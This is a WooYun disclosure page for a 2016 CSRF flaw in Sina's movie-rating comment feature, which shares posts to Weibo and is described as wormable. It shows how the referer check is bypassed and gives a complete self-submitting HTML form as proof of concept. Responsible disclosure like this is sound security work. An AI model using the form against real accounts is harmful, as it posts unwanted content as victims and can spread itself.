当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167674

漏洞标题:新浪微博CSRF之点我链接发微博(可蠕虫)

相关厂商:新浪微博

漏洞作者: zhchbin

提交时间:2016-01-06 09:50

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

继续!

详细说明:

功能在这个页面:http://ku.ent.sina.com.cn/movie/24413的评分写评论处,支持分享到微博。有检查referer,但可以被绕过,只要referer中带有:

ku.ent.sina.com.cn


即可以绕过,例如:

http://test.com?http://ku.ent.sina.com.cn/movie/24413

漏洞证明:

20160106001513.png


测试页面

<form action="http://ku.ent.sina.com.cn/comment/add_comment" method="post">
<input type="text" name="id" value="24413"/>
<input type="text" name="res_name" value="movie"/>
<input type="text" name="newsid" value="dafen_movietest2_24413"/>
<input type="text" name="allScore" value="10"/>
<input type="text" name="isShareWeibo" value="1"/>
<input type="text" name="isAnonymous" value="0"/>
<input type="text" name="isSpoiler" value="0"/>
<input type="text" name="content" value="好久没有看这么好看的片了!"/>
<script> document.forms[0].submit(); </script>
</form>


20160106001813.png


修复方案:

照旧

版权声明:转载请注明来源 zhchbin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-06 10:37

厂商回复:

感谢关注新浪安全,漏洞修复中

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-06 09:57 | 小川 认证白帽子 ( 核心白帽子 | Rank:1471 漏洞数:224 | 一个致力要将乌云变成搞笑论坛的男人)

    节操......

  2. 2016-01-06 10:53 | px1624 ( 普通白帽子 | Rank:1074 漏洞数:181 | px1624)

    @小川 蠕虫才5分

  3. 2016-01-06 11:13 | zhchbin ( 普通白帽子 | Rank:113 漏洞数:24 | 要走得再远一些!|但行好事,不问前程)

    @px1624 @小川 哎,感谢新浪微博为我的rank提供的提升空间,为了这分节操都不要了。